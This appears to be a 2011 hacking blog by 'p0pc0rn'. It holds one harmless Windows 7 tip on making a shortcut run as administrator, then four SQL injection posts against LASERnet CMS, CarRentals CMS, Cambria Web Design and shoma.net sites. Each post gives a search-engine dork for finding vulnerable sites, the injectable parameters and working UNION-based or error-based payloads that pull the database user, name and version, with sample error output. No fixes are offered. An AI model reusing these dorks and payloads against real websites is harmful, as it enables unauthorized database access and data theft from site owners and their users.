Monday, August 22, 2011

Run the Application as Administrator Just by a Click!

How to Set Our Application to Always Running as Administrator in Windows 7
------------------------------------------------------------------------------------------------
-----

1 - Right click to the application that you want to run as administrator and choose properties.Before that make sure you already set the shortcut for the application.
As example I created a cmd.exe shortcut at Desktop.I want to run cmd.exe as administrator just by a click after this.No need to right click,blalala..wasting my time!


2 - Go to Shortcut tab and choose Advanced.
3 - Tick "Run as Administrator",and DONE!
  
Before as Administrator
After as Administrator.Just by a click!

Share:

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

Title : LASERnet CMS  Vulnerable to SQL Injection
Vendor : http://cms.lasernet.gr/index.php?lang=en
Dork : intext:"Powered by Lasernet"
Category: WebApps


http://localhost.com/index.php?id=[SQL]

Demo:
http://localhost.com/index.php
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+


thanks,
-p0pc0rn-


Share:

CarRentals CMS Vulnerable to SQL Injection


Title : CarRentals CMS Vulnerable to SQL Injection
Vendor : N/A
Dork : intext:"Powered by CarRentals CMS"
Category: WebApps


http://localhost.com/*.php?id=[SQL]

~/POC/~
-------

http://localhost.com/book-offer.php?offer_id=-1' /*!12345union*/ select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11--+


thanks,
-p0pc0rn-
Share:

Thursday, August 4, 2011

Cambria Web Design Vulnerable to Multiple SQL Injection


Title : Cambria Web Design Vulnerable to Multiple SQL Injection
Vendor : http://www.cambria.com
Dork : intext:"Web Design by Cambria" filetype:asp
Dork2 : intext:"Custom software and Web Design by Cambria"
Category: WebApps


http://localhost.com/product_page.asp?ProductID=[SQL]&ProductCatID=[SQL]
http://localhost.com/pagecontent.asp?page=[SQL]
http://localhost.com/product_page.asp?Search=[SQL]
http://localhost.com/articles.asp?ArticleID=[SQL]


There are more parameters need to be checked.

~//POC//~

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/product_page_detail.asp, line 78

-------------------------------------------------------------------------------------
http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1+or+1=convert(int,(@@version))

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/product_page_detail.asp, line 78
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

- p0pc0rn -
Share:

shoma.net Web Design Vulnerable to Multiple SQL Injection


Title : shoma.net Web Design Vulnerable to Multiple SQL Injection
Website : http://www.shoma.net/
Dork : Developed by Shoma.net
Type : WebApps


http://localhost.com/SubNews.cfm?NewsID=[SQL]
http://localhost.com/details.cfm?TourID=[SQL]&categoryId=[SQL]
http://localhost.com/Hotellist.cfm?starID=[SQL]
http://localhost.com/index_show.asp?idbasic=[SQL]
http://localhost.com/index_view.asp?idrecipie=[SQL]

There are more parameters need to be checked.

#####
#POC#
#####

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://127.0.0.1/Subnews.cfm?newsid=1'
Error Executing Database Query.
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'newsId=1'''.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++


- p0pc0rn -
Share: